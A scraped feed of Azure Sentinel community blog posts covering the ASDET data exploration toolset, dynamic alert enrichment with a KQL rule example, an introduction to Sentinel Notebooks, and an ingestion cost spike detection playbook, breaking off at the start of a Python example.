onclick="event.preventDefault();">Visualizing anomalies</span></span><SPAN style="color: inherit; font-family: inherit;">&nbsp; &nbsp; &nbsp;</SPAN></H2> <H2><FONT size="5">Summary:</FONT></H2> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; ASDET provides security analysts with a complete set of tools to explore any security log dataset programmatically instead of manually. While the examples here show their use with Azure Sentinel and Azure Log Analytics data, the tools can be used with log data from most other sources.</P> <P>&nbsp; &nbsp; &nbsp; Exploring data programmatically saves an analyst’s time and means they can investigate new datasets quickly and effectively. Moreover, ASDET’s capabilities such as Data Inference, Feature Engineering and Anomaly Detection are not restricted to Azure; with slight modification they can be applied to any dataset. To find out more details and to see the code, check out the ASDET GitHub at <A href="#" target="_blank" rel="noopener">microsoft/ASDET (github.com)</A></P> <P>&nbsp;</P> Fri, 03 Sep 2021 23:48:32 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-data-exploration-toolset-asdet/ba-p/2712728 znguyen 2021-09-03T23:48:32Z Alert enrichment "how to reduce incident triage and investigation times using dynamic alert details” https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/alert-enrichment-quot-how-to-reduce-incident-triage-and/ba-p/2687271 <P>In this blog post we will explore the new “Alert enrichment” in Azure Sentinel Analytics and do a deep dive into the "Alert details" dynamic content ability.</P> <P>&nbsp;</P> <P>The “Alert enrichment” abilities consist of three parts:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_1-1629972572693.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305979i10D4FC806367D210/image-size/large?v=v2&amp;px=999" role="button" 
title="romarsia_1-1629972572693.png" alt="romarsia_1-1629972572693.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>1.&nbsp;</STRONG><A href="#" target="_blank" rel="noopener"><STRONG>Entity mapping:</STRONG> </A>Entity mapping is an integral part of the&nbsp;<A href="#" target="_self">scheduled query analytics rules</A>&nbsp;configuration. It enriches the rules' output (alerts and incidents) with essential information that serves as the building blocks for any investigation processes and remediation actions that would follow.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_5-1629972828904.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305983iC0AE57845F3D80AA/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_5-1629972828904.png" alt="romarsia_5-1629972828904.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>2. <A href="#" target="_blank" rel="noopener">Custom details</A>:</STRONG> Using the custom details feature in the analytics rule wizard, you can surface event data in the alerts that are constructed from those events, making the event data part of the alert properties. 
In effect, this gives you immediate event content visibility in your incidents, enabling you to triage, investigate, draw conclusions, and respond with much greater speed and efficiency.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_2-1629972633807.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305980iF3411156A432AB39/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_2-1629972633807.png" alt="romarsia_2-1629972633807.png" /></span></P> <P class="lia-indent-padding-left-60px"><STRONG><SPAN>Accessing custom details:</SPAN></STRONG></P> <P class="lia-indent-padding-left-90px"><STRONG>i. Alert:</STRONG> you can access the custom details from the alert by reviewing the extended properties.</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_3-1629972717334.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305981iDD8AE2BBA94966D6/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_3-1629972717334.png" alt="romarsia_3-1629972717334.png" /></span></P> <P class="lia-indent-padding-left-90px"><STRONG>ii. Incident:</STRONG> on the incident timeline you can see all the alerts related to this incident. 
Each alert has its own custom details, which are visible when we open the alert in the entity timeline view.</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_4-1629972763474.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305982iB2A59556BCC574D6/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_4-1629972763474.png" alt="romarsia_4-1629972763474.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>3.&nbsp;</STRONG><A href="#" target="_blank" rel="noopener"><STRONG> Alert details:</STRONG></A> With the alert details feature, you can customize the alert's appearance and content. Here you can select parameters in your alert that can be represented in the name or description of each instance of the alert, or that can contain the tactics and severity assigned to that instance of the alert. If the selected parameter has no value (or an invalid value in the case of tactics and severity), the alert details will revert to the defaults specified in the first page of the wizard. For severity, a valid value is one of Informational, Low, Medium or High, so make sure the column your query emits contains exactly those strings.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_6-1629972885888.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305984i45410C7065D735A2/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_6-1629972885888.png" alt="romarsia_6-1629972885888.png" /></span></P> <P>As you can probably tell, we are going to take a deep dive into the “Alert details” dynamic content.</P> <P>&nbsp;</P> <P><STRONG>Why “Alert details” dynamic content?</STRONG> <BR />Generally, the purpose of “alert enrichment” is to allow customization of the alert created from the detection.<BR />The main goal is to reduce the time it takes an analyst to triage and handle the incident.&nbsp;The same applies for 
“Alert details” dynamic content.<BR />In Azure Sentinel, when you create a detection (an analytics rule), the rule name (and the description, MITRE tactics and severity) populate the alerts created from that rule.<BR />Now let’s examine the following case study to see how we can leverage the “Alert details” dynamic content for better investigation and incident handling.</P> <P>&nbsp;</P> <P><STRONG><SPAN>Case study – “Multiple Teams deleted by a single user”.</SPAN></STRONG></P> <P><SPAN>Let’s take a look at the following <A href="#" target="_blank" rel="noopener">detection</A>. </SPAN></P> <P><SPAN>This is out-of-the-box content provided by Azure Sentinel.</SPAN></P> <P>In this detection we are trying to spot a single user who deleted multiple Teams (groups) within an hour.<BR />As you can see, the severity of such a detection is set to “low”, which makes sense because this action by itself is not high-impact.<BR />Now, assuming that the user who performed these actions is an Admin in the organization, we might want to raise the severity, since this might indicate that the account has been compromised.</P> <P><SPAN>&nbsp;</SPAN></P> <P><STRONG><SPAN>What are we going to do?</SPAN></STRONG></P> <P><SPAN>We’ll create a watchlist in which we will store all these high-profile/high-risk accounts.&nbsp;</SPAN></P> <P><SPAN>This list will be accessed later on by the rule.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_7-1629973014456.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305985i2898988248FD6585/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_7-1629973014456.png" alt="romarsia_7-1629973014456.png" /></span></P> <P><STRONG><SPAN>Note:</SPAN></STRONG><SPAN> we can also use the </SPAN><SPAN><A href="#" target="_blank" rel="noopener">watchlist templates</A>; each built-in watchlist template has its own set of data listed in the CSV file 
attached to the template.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_8-1629973052586.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305986iB01DD4B7177D944C/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_8-1629973052586.png" alt="romarsia_8-1629973052586.png" /></span></P> <P>Now we can create our rule from the template:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_14-1629973788456.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305995iE82D1DA1E20F3A14/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_14-1629973788456.png" alt="romarsia_14-1629973788456.png" /></span></P> <P>When creating the rule, we are going to customize the query in order to create incidents with different values according to the user who performed the action.<BR />What we used to do with multiple rules, we are now going to do with just one.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_10-1629973179981.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305989iFF143ED065B66490/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_10-1629973179981.png" alt="romarsia_10-1629973179981.png" /></span></P> <P>Each event will have a column called “Severity”, which is set according to whether the user who performed the action appears in the watchlist.<BR />Now we can make the magic happen!<BR />By using “Alert details” dynamic content, we can make the alert severity (and that of the corresponding incident) change dynamically according to the value of the column.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_11-1629973212833.png" style="width: 999px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305990i750C045F68913E18/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_11-1629973212833.png" alt="romarsia_11-1629973212833.png" /></span></P> <P>This means that when a user from the watchlist deletes 3 or more groups, a high-severity alert and incident will be created; for any other user, the alert keeps the low severity.</P> <P>&nbsp;</P> <P><STRONG>But we want more!</STRONG></P> <P><BR />Now that this rule creates these 2 types of incidents, we can improve the incidents even further.<BR />The first thing an analyst will do with a high-severity incident from this rule is ask: “Which user from the list performed this action?”<BR />To get a quick answer we can take 2 approaches:</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG><SPAN>#1 – the custom details approach: </SPAN></STRONG></P> <P class="lia-indent-padding-left-30px"><SPAN>Using the custom details feature in the Analytics Rule wizard, you can surface event data in the alerts that are constructed from those events, making the event data part of the alert properties. 
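</SPAN></P> <P class="lia-indent-padding-left-30px">Before going further, here is the complete rule query the case study describes, as an added example rather than the query shown in the post's screenshots: the watchlist alias (HighRiskAccounts, with the account UPN in its SearchKey column), the OfficeActivity column names and the threshold of three deletions are assumptions. Every row carries a valid Severity value plus the columns that the alert details, entity mapping and custom details settings consume.</P>

```kusto
// Added example for the case study above; not the query from the post's screenshots.
// Assumptions: a watchlist with alias 'HighRiskAccounts' whose SearchKey column holds
// the account UPN, the OfficeActivity columns below, and a threshold of three deletions.
let DeleteThreshold = 3;
let HighRiskUpns = _GetWatchlist('HighRiskAccounts') | project SearchKey;
OfficeActivity
// For a scheduled rule the wizard's lookback period bounds the query; ago(1h) keeps it runnable ad hoc
| where TimeGenerated >= ago(1h)
| where OfficeWorkload =~ "MicrosoftTeams" and Operation =~ "TeamDeleted"
| summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated),
            DeletedTeams = make_set(TeamName), DeletedCount = dcount(TeamName) by UserId
| where DeletedCount >= DeleteThreshold
// One column drives the dynamic severity. Every row gets one of the values Sentinel accepts
// (Informational, Low, Medium, High); anything else makes the alert fall back to the rule default.
| extend Severity = iff(UserId in~ (HighRiskUpns), "High", "Low")
// Fields for the alert name/description placeholders ({{AccountName}}, {{DeletedCount}}),
// for entity mapping (AccountName + AccountUPNSuffix) and for custom details (DeletedTeams, StartTime, EndTime)
| extend AccountName = tostring(split(UserId, "@")[0]),
         AccountUPNSuffix = tostring(split(UserId, "@")[1])
| project TimeGenerated = EndTime, StartTime, EndTime, UserId, AccountName, AccountUPNSuffix,
          DeletedCount, DeletedTeams, Severity
```

<P class="lia-indent-padding-left-30px">In the wizard, map the Severity column under Alert details, set the alert name format to something like "Multiple Teams deleted by {{AccountName}} ({{DeletedCount}} teams)", map AccountName and AccountUPNSuffix to the Account entity, and add DeletedTeams, StartTime and EndTime as custom details. Because the iff() always emits one of the accepted severity strings, the alert never silently falls back to the default severity defined on the first page of the wizard.</P> <P class="lia-indent-padding-left-30px"><SPAN>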
In effect, this gives you immediate event content visibility in your incidents, enabling you to triage, investigate, draw conclusions, and respond faster and more efficiently.&nbsp;</SPAN></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_12-1629973273421.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305992iEC950230DEED0D5F/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_12-1629973273421.png" alt="romarsia_12-1629973273421.png" /></span></P> <P class="lia-indent-padding-left-30px">The only downside to this approach is that an analyst must open the incident to see which user performed the action.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG>#2 – dynamic name approach:</STRONG><BR />In the Alert Name Format field, enter the text you want to appear as the name of the alert (the alert text), and include, in double curly brackets, any parameters you want to be part of the alert text.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_13-1629973344719.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305993i713F40B0461F00F2/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_13-1629973344719.png" alt="romarsia_13-1629973344719.png" /></span></P> <P class="lia-indent-padding-left-30px">This setting means that the display name of the alert (and incident) changes according to the user who triggered the alert.<BR />An analyst reviewing the incident queue can instantly tell which user is involved, which ultimately improves MTTR.<BR />We also changed the description so that it is set dynamically from the actual content of the events.</P> <P>&nbsp;</P> <P>As you can see, alert enrichment really opens up a variety 
of new abilities:</P> <P class="lia-indent-padding-left-30px">• Changing the severity according to the number of results (or based on historical data)<BR />• Leverage the HTML &amp; markdown support on the incident to create richer and more accurate description for the incident <BR />• Change the title according to the user who performed the action <BR />And much more!</P> <P>The goal here is to immediately improve your detections, reduce the number of rules, and result in shorter MTTR.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 01 Sep 2021 07:36:34 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/alert-enrichment-quot-how-to-reduce-incident-triage-and/ba-p/2687271 romarsia 2021-09-01T07:36:34Z Becoming an Azure Sentinel Notebooks ninja - the series! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/becoming-an-azure-sentinel-notebooks-ninja-the-series/ba-p/2693491 <P>Hi, all!</P> <P>&nbsp;</P> <P>Welcome to a new series on Azure Sentinel Notebooks!&nbsp; In this post, we want to introduce everyone to the Notebooks feature of Azure Sentinel and provide some basic knowledge that we’ll build on throughout this series.</P> <P>&nbsp;</P> <P>The series will take the following form:</P> <P>&nbsp;</P> <UL> <LI><STRONG>Part 1:</STRONG> What are notebooks and when do you need them? 
– <STRONG><EM>this post</EM></STRONG></LI> <LI><STRONG>Part 2:</STRONG> <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-2-getting-started-with-azure/ba-p/2716661" target="_self">How to get started with notebooks and tour of the features</A></LI> <LI><STRONG>Part 3:</STRONG> <A href="#" target="_blank" rel="noopener">Overview of the pre-built notebooks and how to use them</A></LI> <LI><STRONG>Part 4:</STRONG> How to create your own notebooks from scratch and how to customize the existing ones</LI> </UL> <P>The diagram below demonstrates a structured learning pathway for you to become an Azure Sentinel Notebooks ninja and&nbsp;<SPAN>earn a Ninja certificate</SPAN>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Notebook ninja training series.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/309074i5C2F9928DC9A682D/image-size/large?v=v2&amp;px=999" role="button" title="Notebook ninja training series.png" alt="Notebook ninja training series.png" /></span></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>What are notebooks and when to use them?</STRONG></FONT></P> <P>&nbsp;</P> <P>We have a number of features built into Azure Sentinel that share the “<EM>books</EM>” nomenclature, i.e., Play<EM>books</EM>, Work<EM>books</EM>, and Note<EM>books</EM> – so it can be confusing at times.</P> <P>&nbsp;</P> <P>Playbooks, of course, are based on Azure Logic Apps and supply some of the automation capabilities for Azure Sentinel. 
Workbooks are provided for analysts and SOC managers to build interactive views and reports of the Azure Sentinel data.</P> <P>&nbsp;</P> <P>Notebooks should be an integral part of the security team’s daily processes, particularly for security teams using Azure Sentinel as their SIEM of choice.</P> <P>&nbsp;</P> <P>The Notebooks feature in Azure Sentinel is built on <EM>Jupyter Notebooks</EM>, an open-source web application that allows anyone to create and share documents that contain live code, equations, visualizations, and narrative text. Its name comes from the three languages it was first built to support: <STRONG>JU</STRONG>lia, <STRONG>PYT</STRONG>hon, and <STRONG>R</STRONG>.</P> <P>&nbsp;</P> <P>Jupyter Notebooks gained popularity in various data science and scientific computing communities such as genome research, astronomy, finance, and stock market prediction, among others. Its ability to parse and present data dynamically and reproducibly made it a natural fit for the cybersecurity field, where it has increasingly become a key tool for security operations.</P> <P>&nbsp;</P> <P>In <A href="#" target="_blank" rel="noopener">Why Use Jupyter for Security Investigations?</A>, <LI-USER uid="313718"></LI-USER>&nbsp;&nbsp;provides some great context for using Jupyter Notebooks for cybersecurity operations, including the capability to access and include external data, a true scripting and programming environment, and a set of steps that are restartable and repeatable.</P> <P>&nbsp;</P> <P>Think of a notebook like OneNote on steroids. 
Just like OneNote, you can store valuable information like text and pictures, but in the case of notebooks, that data is interactive.</P> <P>&nbsp;</P> <P>In short…</P> <UL> <LI><STRONG>Notebooks can be artifact storage</STRONG> – data persistence, repeatability and backtracking allow analysts to collect and store evidence and collateral to improve response the next time a similar event occurs.</LI> <LI><STRONG>Notebooks can be interactive</STRONG> – storing more than just pieces of information, notebooks can execute the scripts they store and produce results inline, building a more efficient and more intelligent approach to investigations and hunting.</LI> <LI><STRONG>Notebooks can be interoperable</STRONG> – notebooks offer deeper programmatic abilities to connect to, store, and use external data dynamically.</LI> <LI><STRONG>Notebooks can be guides</STRONG> – through sophisticated data processing, machine learning, and visualization, notebooks guide analysts through every step of an investigation or hunt to expose, mitigate, and remediate threats to the environment.</LI> </UL> <P>&nbsp;</P> <P>Notebooks in Azure Sentinel extend the capabilities of the overall product. 
Out-of-the-box, every Azure Sentinel instance comes with several ready-made notebooks that provide use cases for things like:</P> <P>&nbsp;</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Scanning for credential leaks in your database environment</A></LI> <LI><A href="#" target="_self">Detecting malicious base64-encoded commands on Linux hosts</A></LI> <LI><A href="#" target="_blank" rel="noopener">Generating baselines in network activities</A></LI> </UL> <P>&nbsp;</P> <P>To have a better understanding of who needs to use which “<EM>book</EM>” and when, the following table breaks these areas down side-by-side per suggested role along with providing the uses and pros and cons for each.</P> <TABLE> <TBODY> <TR> <TD width="167">&nbsp;</TD> <TD width="303"> <P class="lia-align-center"><FONT size="4"><STRONG>Playbooks</STRONG></FONT></P> </TD> <TD width="311"> <P class="lia-align-center"><FONT size="4"><STRONG>Workbooks</STRONG></FONT></P> </TD> <TD width="415"> <P class="lia-align-center"><FONT size="4"><STRONG>Notebooks</STRONG></FONT></P> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Roles</STRONG></FONT></P> </TD> <TD width="303"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOC engineers</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Analysts of all tiers</P> </TD> <TD width="311"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOC engineers</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Analysts of all tiers</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOC managers</P> </TD> <TD width="415"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Threat hunters/Tier 2-3 analysts</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Incident investigators</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Cyber data scientists</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Security researchers</P> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Uses</STRONG></FONT></P> </TD> <TD width="303"> <P>Automation of simpler, repeatable tasks:</P> <UL 
class="lia-list-style-type-square"> <LI>Ingestion – bring in external data</LI> <LI>Enrichment (TI, GeoIP lookups, etc.)</LI> <LI>Investigation</LI> <LI>Remediation</LI> </UL> </TD> <TD width="311"> <UL class="lia-list-style-type-square"> <LI>Visualization</LI> </UL> </TD> <TD width="415"> <UL class="lia-list-style-type-square"> <LI><FONT color="#0000FF">Querying Azure Sentinel &amp; external data&nbsp;</FONT></LI> <LI><FONT color="#0000FF">Enrichment (TI, GeoIP, WhoIs lookups, etc.)</FONT></LI> <LI><FONT color="#0000FF">Investigation</FONT></LI> <LI><FONT color="#0000FF">Visualization</FONT></LI> <LI><FONT color="#0000FF">Hunting</FONT></LI> <LI><FONT color="#0000FF">Machine Learning &amp; big data analytics</FONT></LI> </UL> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Pros</STRONG></FONT></P> </TD> <TD width="303"> <UL class="lia-list-style-type-circle"> <LI>Best for single, repeatable tasks</LI> <LI>No coding knowledge required</LI> </UL> </TD> <TD width="311"> <UL class="lia-list-style-type-circle"> <LI>Best for high-level view of Sentinel data</LI> <LI>No coding knowledge required</LI> </UL> </TD> <TD width="415"> <UL class="lia-list-style-type-circle"> <LI><FONT color="#0000FF">Best for more complex chain of repeatable tasks</FONT></LI> <LI><FONT color="#0000FF">Ad-hoc, more procedural control – easy to pivot due to the interactive characteristics and the use of Python, a procedural language</FONT></LI> <LI><FONT color="#0000FF">Rich Python libraries for data manipulation &amp; visualization options</FONT></LI> <LI><FONT color="#0000FF">Machine Learning &amp; custom analysis</FONT></LI> <LI><FONT color="#0000FF">Easy to document &amp; share analysis evidence</FONT></LI> </UL> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Cons</STRONG></FONT></P> </TD> <TD width="303"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Not suitable for ad-hoc &amp; complex chain of tasks</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Not great for documenting 
&amp; sharing evidence</P> </TD> <TD width="311"> <P>•&nbsp; &nbsp;Cannot integrate with external data</P> </TD> <TD width="415"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Higher learning curve - requires coding knowledge *</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/software-defined-monitoring-using-automated-notebooks-and-azure/ba-p/2587775" target="_blank" rel="noopener">Limited automated execution</A> (automation capabilities should be improved in the near future)</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>* Anyone can use our built-in notebooks without coding knowledge, but additional skills are needed to take notebooks to an advanced level. This is one of the reasons for the effort behind this Azure Sentinel Notebook Ninja series, and also a big reason for an upcoming public-facing, <STRONG>free training series for Azure Sentinel Notebooks</STRONG>.</P> <P>&nbsp;</P> <P>To register, visit <A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars,</A> look for the <STRONG>Azure Sentinel | Become a Notebooks ninja</STRONG> webinar and fill out the registration form.</P> <P>&nbsp;</P> <P>We are super-excited to be bringing this series (and the training) to you! 
Look for more great knowledge on Azure Sentinel Notebooks as we supply new installments of this series.</P> <P>&nbsp;</P> <P>Additionally, we've launched a brand new email DL specifically for Azure Sentinel Notebooks: <A href="https://gorovian.000webhostapp.com/?exam=mailto:asinotebooks@service.microsoft.com" target="_blank" rel="noopener">asinotebooks@service.microsoft.com</A>.&nbsp;This DL is monitored by various product teams and is intended to be used to collect and respond to questions, issues, and feedback.</P> <P>&nbsp;</P> <P>Stay tuned!</P> <P>&nbsp;</P> <P>More reading/tutorial resources:</P> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/why-use-jupyter-for-security-investigations/ba-p/475729" target="_blank" rel="noopener">Blog: Why Jupyter notebooks are a key tool to SecOps</A></LI> <LI><A href="#" target="_blank" rel="noopener">Webinar: How to get started - Azure Sentinel notebooks</A></LI> <LI><A href="#" target="_blank" rel="noopener">Webinar: Software-defined monitoring - Using automated notebooks and Azure Sentinel to improve SecOps</A></LI> <LI><A href="#" target="_blank" rel="noopener">Webinar: Customizing Azure Sentinel with Python - MSTICPy and Jupyter Notebooks</A></LI> <LI><A href="#" target="_blank" rel="noopener">Notebook examples on the Azure Sentinel GitHub Repository</A></LI> <LI><A href="#" target="_blank" rel="noopener">Project Jupyter</A></LI> <LI><A href="#" target="_blank" rel="noopener nofollow noreferrer">Azure Sentinel Weekly Newsletter</A></LI> </UL> <P>&nbsp;</P> <P>Special thanks to my dear colleague,&nbsp;<LI-USER uid="324945"></LI-USER>,&nbsp;for his major collaboration on this blog series and drafting this post!</P> <P>&nbsp;</P> <P>&nbsp;</P> Tue, 12 Oct 2021 01:55:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/becoming-an-azure-sentinel-notebooks-ninja-the-series/ba-p/2693491 Chi_Nguyen 2021-10-12T01:55:38Z Ingestion Cost Spike detection Playbook 
https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-spike-detection-playbook/ba-p/2591301 <P><FONT size="5"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="IngestionSpike.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306893iC006CDF4F0F90C02/image-size/large?v=v2&amp;px=999" role="button" title="IngestionSpike.png" alt="IngestionSpike.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="3">Azure Sentinel is a modern SIEM solution offering cloud-scale analytics to power your threat detection and response requirements. Like most cloud solutions, the billing for Azure Sentinel is largely based on a pay-per-use model. Specifically for Azure Sentinel, billing is based on the amount of data ingested into Log Analytics and Azure Sentinel. To ensure that you keep visibility when the amount of billable data ingested into the platform experiences an unexpected spike, we have developed this Logic App to address exactly this sort of scenario.</FONT></P> <P><FONT size="3">This ingestion cost spike alert logic app is based on the principle of anomaly detection and as such utilizes the built-in KQL function <A href="#" target="_blank" rel="noopener"><STRONG>series_decompose_anomalies().</STRONG></A> It models the expected level of ingestion per table from the historical pattern over a look-back period and then uses that pattern to decide whether the most recent day represents a sudden increase of billable data into the workspace. Below is an image depicting the various actions the Logic App steps through, followed by a detailed explanation of the key parts of the query that checks for anomalies based on the historical ingestion pattern. The Logic App is triggered on a recurring schedule. 
Since you probably want to be immediately notified when this type of anomaly occurs then you may want to run it on a daily basis.</FONT></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="LogicAppOverview.png" style="width: 569px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298693iC440BCB0645988A2/image-size/large?v=v2&amp;px=999" role="button" title="LogicAppOverview.png" alt="Image of Logic App overview" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Image of Logic App overview</span></span></P> <P>&nbsp;</P> <LI-CODE lang="applescript">let UpperThreshold = UpperAnomalyThreshold; //+3 is the suggested number and it indicates a strong anomaly though you can modify it : Outlier - Wikipedia Usage | where IsBillable == "true" //we are only interested in tables getting notified when a spike is detected in a billable table | where Quantity &gt; ReportingQty //Allows you to report only on variations that are above a certain threshold that you deem significant enough to warrant an alert | make-series Qty=sum(Quantity) on TimeGenerated from ago((LookBack)d) to now() step 1d by DataType //creates a time series to look at the ingestion pattern over the period defined in the LookBack variable | extend (anomalies, score, baseline) = series_decompose_anomalies(Qty, 1.5, 7, 'linefit', 1, 'ctukey', 0.01) //takes the time series of ingested data across the days specified in the ‘LookBack’ variable and extract anomalous points with scores based on predicted values using the linear regression concept. See https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/series-decompose-anomaliesfunction for a detailed explanation of each argument. For an explanation of 'ctukey' read: Outlier - Wikipedia. 
| where anomalies[-1] == 1 or anomalies[-1] == -1 //the output of series_decompose_anomalies function is three things: A ternary (as opposed to binary) series containing (+1, -1, 0) marking up/down/no anomaly respectively, the Anomaly score and the predicted value or baseline. | extend Score = score[-1] //this part picks up the anomaly state from the most recent run. -1 indicates a position in the array. | where Score &gt;= UpperAnomalyThreshold //compare with strong anomaly indicator values extracted from the time series data | extend PercentageQtyIncrease = ((round(todouble(Qty[-1]),0)-round(todouble(baseline[-1]),1))/round(todouble(Qty[-1]),0) * 100) //calculates percentage increase to present data in percent terms for easier appreciation of the anomaly | project DataType,ExpectedQty=round(todouble(baseline[-1]),0), ActualQty=round(todouble(Qty[-1]),0),round(PercentageQtyIncrease,0) | order by round(todouble(PercentageQtyIncrease),0) desc | where PercentageQtyIncrease &gt; PercentIncrease //only alert if the percentage increase exceeds the threshold beyond which you specified that you wish to be notified </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT size="3"><STRONG>Note:</STRONG> This logic app is complementary to the previously released <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-alert-playbook/ba-p/2006003" target="_blank" rel="noopener">Ingestion Cost Alert App</A> but different in function. The Ingestion Cost Alert App is designed to send you alerts if the budget you define is exceeded. In contrast, the Ingestion Cost Anomaly App is designed to alert you, should there be an unusual spike in the billable data being ingested into the Log Analytics workspace where you have deployed Azure Sentinel. 
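</FONT></P> <P>&nbsp;</P> <P><FONT size="3">As an added example that is not part of the playbook, the following stand-alone Python script replays the query's gating logic over a constructed 28-day ingestion history. It does not reproduce Kusto's <STRONG>series_decompose_anomalies()</STRONG>: the baseline is a same-weekday median and the score a robust residual, so the score values differ from Kusto's, but the three gates (anomaly score, minimum increase, percentage increase) follow the query above. The table names, volumes and gate defaults are all assumptions made up for the example.</FONT></P>

```python
"""Added example, not the playbook's own code: a stand-alone Python analogue of
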